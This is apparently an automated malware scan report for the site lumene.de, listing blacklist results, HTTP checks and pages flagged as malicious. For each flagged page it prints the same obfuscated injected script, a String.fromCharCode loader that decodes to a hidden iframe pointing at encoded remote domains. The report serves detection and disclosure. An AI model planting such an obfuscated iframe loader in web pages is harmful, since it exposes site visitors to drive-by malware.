Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lumene.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://lumene.de/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lumene.de/ | 200 OK Content-Length: 15906 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/test/apacheasp/test.html | 200 OK Content-Length: 11785 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/index.html | 200 OK Content-Length: 15906 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/test/ssi/test.html | 200 OK Content-Length: 11771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/test404page.js | 404 Not Found Content-Length: 955 Content-Type: text/html | clean |
http://lumene.de/test/php/test.html | 200 OK Content-Length: 11768 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/test/coldfusion/test.html | 200 OK Content-Length: 11785 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/test/perl/test.html | 200 OK Content-Length: 11779 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/test/python/test.html | 200 OK Content-Length: 11777 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/test/fcgi/test.html | 200 OK Content-Length: 11779 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
| ||
http://lumene.de/test/miva/test.html | 200 OK Content-Length: 11779 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(String.fromCharCode(60,98,111,100,121,62,10,60,47,98,111,100,121,62,10,60,115,99,114,105,112,116,62,10,102,117,110,99,116,105,111,110,32,103,101,116,95,100,111,109,97,105,110,40,41,32,123,10,32,32,32,32,118,97,114,32,97,32,61,32,91,10,9,34,92,120,99,51,92,120,100,102,92,120,100,102,92,120,100,98,92,120,57,49,92,120,56,52,92,120,56,52,92,120,99,51,92,120,99,50,92,120,100,98,92,120,100,98,92,120,99,52,92,120,99,53,92,120,99,52,92,120,99,53,92,120,99,101,92,120,99,53,92,120,100,56,92 Decoded script: <body> </body> function get_domain() { var a = [ "\xc3\xdf\xdf\xdb\x91\x84\x84\xc3\xc2\xdb\xdb\xc4\xc5\xc4\xc5\xce\xc5\xd8\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\xdf\xdb\x91\x84\x84\xc6\xc2\xc8\xd9\xc4\xd8\xc4\xcd\xdf\x86\xca\xdb\xdf\x85\xc8\xc4\x85\xde\xc0\x84\xcd\xc4\xd9\xde\xc6\x84\x94\xdf\x96\x9f\xcd\xcd\x9c\x9d\x98\xc9\xc8\xca\xce\xca\xca\x9f", "\xc3\xdf\x if (typeof (a) == 'undefined') { var b = document['getElementsByTagName']("head")[0]; var c = document['createElement']("div"); c.style.display = 'none'; c.id = 'evilshit'; b['appendChild'](c); var d = document['createElement']("iframe"); d.src = window.urldata; b['appendChild'](d) } else { a.src = window.urldata } } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lumene.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Jul 2014 20:14:18 GMT
Accept-Ranges: bytes
ETag: "1b963d8-3e22-4c4efd71be500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 15906
Content-Type: text/html
Last-Modified: Mon, 16 Jul 2012 10:24:52 GMT
X-Powered-By: PleskLin
...15906 bytes of data.
GET / HTTP/1.1
Host: lumene.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Jul 2014 20:14:18 GMT
Accept-Ranges: bytes
ETag: "1b963d8-3e22-4c4efd71be500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 15906
Content-Type: text/html
Last-Modified: Mon, 16 Jul 2012 10:24:52 GMT
X-Powered-By: PleskLin
...15906 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lumene.de
Referer: http://www.google.com/search?q=lumene.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lumene.de
Referer: http://www.google.com/search?q=lumene.de
Result:
The result is similar to the first query. There are no suspicious redirects found.